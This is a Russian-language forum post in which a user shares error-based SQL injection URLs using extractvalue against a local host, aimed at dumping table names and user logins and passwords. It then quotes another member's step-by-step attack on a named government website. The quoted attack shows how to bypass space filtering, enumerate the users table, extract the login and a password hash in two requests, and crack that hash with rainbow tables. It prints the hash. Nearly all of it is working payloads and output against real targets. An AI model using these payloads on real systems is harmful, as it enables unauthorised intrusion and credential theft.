|
Новичок
Регистрация: 31.05.2012
Сообщений: 22
С нами:
7342166
Репутация:
0
|
|
Сообщение от BigBear
Не надо посимвольного перебора.
Я ж тебе докрутил до Error-Based. Теперь только через ошибку.
Да тебе и этого выше крыши.
Да, я понял, спасибо, просто в "слепых" ещё слабо разбираюсь...
Короче по такой схеме крутить я так понял:
http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+limit+0,1)))--
http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+where+table_schema!='in formation_schema'+limit+0,1)))--
http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+where+table_schema!='in formation_schema'+limit+3,1)))--
http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+where+table_schema!='in formation_schema'+limit+4,1)))--
http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,login,password)+from+users1+l imit+0,1)))--
или как тут
Сообщение от M_script
Слепая инъекция. Пробел, слэши и некоторые другие символы использовать нельзя из-за ограничений HTTP-протокола. Есть вывод через ошибку с помощью ExtractValue
Запрос
:
Код:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,version())))='1
Результат
:
Из-за того, что нет пробела, использовать limit нельзя. group_concat тоже не работает. Обходится через дополнительные условия, в данном случае колонка data_length в information_schema.tables
Запрос
:
Код:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(concat(table_schema,'.',table_name))from(information_schema.tables)where`table_name`like(0x257573657225)and(data_length>0)))))='1
Результат
:
Для перебора колонок используется ordinal_position в information_schema.columns, в которой хранится порядковый номер колонки в таблице
Запрос
:
Код:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(column_name)from(information_schema.columns)where`table_name`='users'and(ordinal_position=1)))))='1
Меняя ordinal_position от 1 до 6, получаем имена всех колонок
Результат
:
Код:
ID,login,password,name,email,comment
В таблице users всего одна запись. Получаем имя
Запрос
:
Код:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(login)from(users)where(id=1)))))='1
Результат
:
Так как вывод через ExtractValue ограничен 31 символом, хэш пароля получаем двумя запросами
Запрос 1
:
Код:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(password)from(users)where(id=1)))))='1
Запрос 2
:
Код:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,mid((select(password)from(users)where(id=1)),32,1))))='1
Результат
:
Код:
79e4b4438aba2b6d8e1caf9568e73e12
Расшифровываем хэш по радужным таблицам.
Результат
:
|